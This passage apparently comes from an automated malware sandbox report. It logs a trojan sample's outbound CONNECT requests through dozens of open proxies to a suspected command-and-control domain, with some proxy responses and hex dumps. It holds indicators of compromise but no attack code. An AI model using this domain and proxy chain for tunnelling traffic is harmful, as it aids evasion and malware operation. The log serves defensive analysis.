                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1012192.168.2.853146221.2.84.42108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.321098089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1013192.168.2.849848162.240.75.37805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.328208923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.397924900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.385113955 CET1286INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:33 GMT
                                                                                Server: Apache
                                                                                Accept-Ranges: bytes
                                                                                Cache-Control: no-cache, no-store, must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: 0
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>500 Internal Server Error</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-rea
                                                                                Feb 23, 2024 14:28:34.385180950 CET1286INData Raw: 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e
                                                                                Data Ascii: son { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; backg
                                                                                Feb 23, 2024 14:28:34.385373116 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a
                                                                                Data Ascii: font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: ce
                                                                                Feb 23, 2024 14:28:34.385381937 CET1286INData Raw: 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69
                                                                                Data Ascii: info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; m
                                                                                Feb 23, 2024 14:28:34.385457039 CET1286INData Raw: 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63
                                                                                Data Ascii: F+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9
                                                                                Feb 23, 2024 14:28:34.385466099 CET1286INData Raw: 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64
                                                                                Data Ascii: yMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvB
                                                                                Feb 23, 2024 14:28:34.385526896 CET1032INData Raw: 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69
                                                                                Data Ascii: fBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc
                                                                                Feb 23, 2024 14:28:34.385644913 CET1286INData Raw: 35 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 73 70 61 6e
                                                                                Data Ascii: 500</span> <span class="status-reason">Internal Server Error</span> </section> <section class="contact-info"> Please forward this error screen to heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:34.385767937 CET500INData Raw: 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20
                                                                                Data Ascii: /div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=500referral" target="cpanel" title="cPanel, Inc.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1014192.168.2.849759128.199.104.190413545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.404484987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.398061037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1015192.168.2.853179103.217.217.19080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.439057112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.907609940 CET202INHTTP/1.0 403 Forbidden
                                                                                Content-Length: 812
                                                                                Content-Type: text/html
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Expires: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Server: Mikrotik HttpProxy
                                                                                Proxy-Connection: close
                                                                                Feb 23, 2024 14:28:30.950608969 CET202INHTTP/1.0 403 Forbidden
                                                                                Content-Length: 812
                                                                                Content-Type: text/html
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Expires: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Server: Mikrotik HttpProxy
                                                                                Proxy-Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1016192.168.2.849752202.146.228.25480885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.462786913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.585453987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.585834026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.658399105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1017192.168.2.84982783.149.249.8131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.465918064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.492026091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.145292997 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1018192.168.2.849835208.87.131.151253695828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.467113018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.492069960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1019192.168.2.853188200.170.196.9410805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.472018003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1020192.168.2.851943212.110.187.185344055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.484004974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.585463047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.185864925 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1021192.168.2.851973195.248.243.14972375828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.493902922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1022192.168.2.85321843.153.36.484435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.493992090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1023192.168.2.853196103.113.71.23010815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.499890089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1024192.168.2.853184125.228.143.20741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.511198044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1025192.168.2.849861103.113.71.23031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.511495113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.589191914 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1026192.168.2.85323143.153.36.484435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.514568090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1027192.168.2.85323343.153.36.484435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.519669056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1028192.168.2.852922104.238.111.10779995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.537700891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991853952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.527579069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491842031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.379283905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.195031881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991924047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581765890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1029192.168.2.85284927.76.194.1310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.568008900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1030192.168.2.85247272.37.216.6841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.568198919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1031192.168.2.85320818.134.236.23131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.568397045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.745995045 CET167INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1032192.168.2.849960185.104.63.5531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.568445921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.585612059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.585906029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.658406973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1033192.168.2.85324643.153.36.484435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.585058928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1034192.168.2.8532008.213.128.90100005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.597959995 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:31.899780989 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1035192.168.2.850090159.203.137.249304335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.598001003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679375887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695099115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695370913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1036192.168.2.849961173.212.237.43446725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
